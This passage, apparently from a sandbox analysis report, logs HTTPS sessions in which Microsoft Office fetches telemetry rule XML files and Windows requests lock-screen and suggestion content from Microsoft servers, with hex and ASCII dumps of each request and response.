6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:43 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:43 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:43 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232543Z-174f78459684bddphC1EWRbht40000000u9g000000000602 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:43 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:43 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:43 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:43 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232543Z-174f7845968px8v7hC1EWR08ng0000000us000000000041z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:43 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	49852	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:44 UTC	2587	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232540Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=5215c2ca03244514bbfe7952d92f973f&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-280815&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p= Cache-Control: no-cache MS-CV: y7MCjIAgcU2SEYAx.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:45 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2937 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: BHxb7OGUJWs1EJIeg64LhA+MSOIawSy6nG1TZHSeOFbKIHMK+8xIOKZzTNC4ZOHJsr8G3LV/VyTGo7ruswt5GEdqmT+Fc9Bg1/zH3I/I2EqB9KFJpr5q18wuJjtkLv/DGJ+TXloauvx2Z+CxGI+6tleYmw3uZnaVy5tPrhzbmcsW7SIdQ/jI3/qxTZgPCkQvuE/BqocmL0+CANMmV1oviAJOQ+ArMOLniC8vycTNqs2PQ8X/yhltip7VcIXKAwwDs5ZuzHuzSHlDZ2WpcTewAVTcS81x1QcxYbHT2arZmTkGlyZtTeiw5zGGTsc741VSRFvwrGhzsYG4T+UFgB098w== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:44 GMT Connection: close
2024-11-25 23:25:45 UTC	2937	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	49853	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:44 UTC	2594	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232540Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b27edecff88246e3b3e0af832e23a305&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338388&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p= Cache-Control: no-cache MS-CV: y7MCjIAgcU2SEYAx.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:45 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 3892 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: vPVpLC+j25tpPqUyB0wTVkh6jJkn0wwf7d114zg7bI0FZnU69jlPWnjTvj+6fpNja4vQs7dioqw/45ijUY0Dic/OlhoJ8Z4ux9g5rtKhhFoRVHLrBH8zco8kcGDFQyJjP4qQnO0Ob553eqQcae9/v5jnpltEvf5gSf8bwFpgWWJpVqpZS6do6w0YKZwvdOu0fzbQhFNuHbKFdespUCByjUyRmBnkQlXA4zXFiOr1t9kmbROvwCicwCodPcFM5IKXqo4bQuPtgxL3tfT/SUu6BwhWfKM+tKElhP3N2MbBcTd77z1VXoFr+bDNGCa9m3BYGsK9ND/JL6h5ujkb2VshGg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:44 GMT Connection: close
2024-11-25 23:25:45 UTC	3892	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	49854	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:44 UTC	2604	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232540Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f16a4b4868cd460ebc3f443cd54eacb4&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338387&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p= Cache-Control: no-cache MS-CV: y7MCjIAgcU2SEYAx.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:45 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 21305 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: MFsoED0k2FUxohPob4J+Sb8LX9Yx4KYojt6TGE9RVGtVXTUSsH75eNAv2UJKqTKz/7Y/L+VigLyQnrwb3tOnDGXDCCwkGaaKjI5fPb0Gp9UjunH5J7KISSl8K4daOvjHPMq6ueniI6QWZmcw/X2D26A8kZ1o85d2ForpM2kaRnMrS0ENi1n4mPXORS8CT9XKBR3P+rpKwFL8jzVFLRO6j2xkPD3dkuwxBA3PRf/zA6Pux85Ez5a5qEXBtuBVO/6T7SdNXhKzSkwO2OiBEB3if+vcHxPkMwpoKUGuclka3N3yNxDL2f7BKfkNfTVJHcljqulq+xgTsk0SWJaJ72m5BA== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:44 GMT Connection: close
2024-11-25 23:25:45 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-11-25 23:25:45 UTC	5736	IN	Data Raw: 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 6c 61 6e 64 73 63 61 70 65 59 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 58 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 59 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 63 6f 70 79 72 69 67 68 74 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 74 65 78 74 5c 22 7d 2c 5c 22 Data Ascii: true,\"type\":\"numeric\"},\"landscapeY\":{\"isOptional\":true,\"type\":\"numeric\"},\"portraitX\":{\"isOptional\":true,\"type\":\"numeric\"},\"portraitY\":{\"isOptional\":true,\"type\":\"numeric\"},\"copyright\":{\"isOptional\":true,\"type\":\"text\"},\"

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:44 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:45 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:44 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232544Z-174f7845968v75bwhC1EWRuqen0000000fh00000000003rf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
